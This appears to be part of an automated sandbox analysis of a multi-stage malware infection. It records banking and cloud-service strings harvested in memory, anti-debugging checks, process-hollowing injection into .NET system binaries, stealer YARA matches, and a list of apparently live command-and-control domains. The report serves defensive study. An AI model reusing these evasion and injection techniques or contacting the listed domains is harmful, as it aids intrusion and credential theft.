                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                  Source: hjhTHr6fWy.exe, 0000000F.00000002.2997443428.0000000006961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,]q
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                  Source: RegAsm.exe, 00000009.00000002.2954309590.00000000066E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                  Source: file.exe, 00000000.00000002.2100263900.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2132726768.00000000008DE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                                  Anti Debugging

                                  barindex
                                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05400879 Start: 054008A2 End: 054008A80_2_05400879
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054008CF Start: 054008A2 End: 054008A80_2_054008CF
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05400E16 rdtsc 0_2_05400E16
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E441E0 LdrInitializeThunk,9_2_06E441E0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00407B01
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001BBDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_001BBDF9
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041914C mov eax, dword ptr fs:[00000030h]13_2_0041914C
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004114A6 mov ecx, dword ptr fs:[00000030h]13_2_004114A6
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001CA0F2 mov eax, dword ptr fs:[00000030h]16_2_001CA0F2
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001C638B mov eax, dword ptr fs:[00000030h]16_2_001C638B
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0024A0F2 mov eax, dword ptr fs:[00000030h]17_2_0024A0F2
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0024638B mov eax, dword ptr fs:[00000030h]17_2_0024638B
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041EFD8 GetProcessHeap,13_2_0041EFD8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess token adjusted: Debug
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess token adjusted: Debug
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00407B01
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407C63 SetUnhandledExceptionFilter,13_2_00407C63
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00407D75
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0040DD78
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001AD048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_001AD048
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001C690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_001C690E
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001ADA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_001ADA05
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0022D048 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0022D048
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0024690E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0024690E
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0022DA05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0022DA05
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: needmoney.exe PID: 6616, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeCode function: 7_2_027A24D9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,7_2_027A24D9
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000 value starts with: 4D5A
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
                                  Source: RegAsm.exe, 0000000D.00000002.2744142845.0000000000479000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: lootebarrkeyn.shop
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeSection unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 117D008Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4DC000
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10CF008
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6FD008
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 802000
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 80C000
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 82C000
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 773008
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45D000
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 627008
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" Jump to behavior
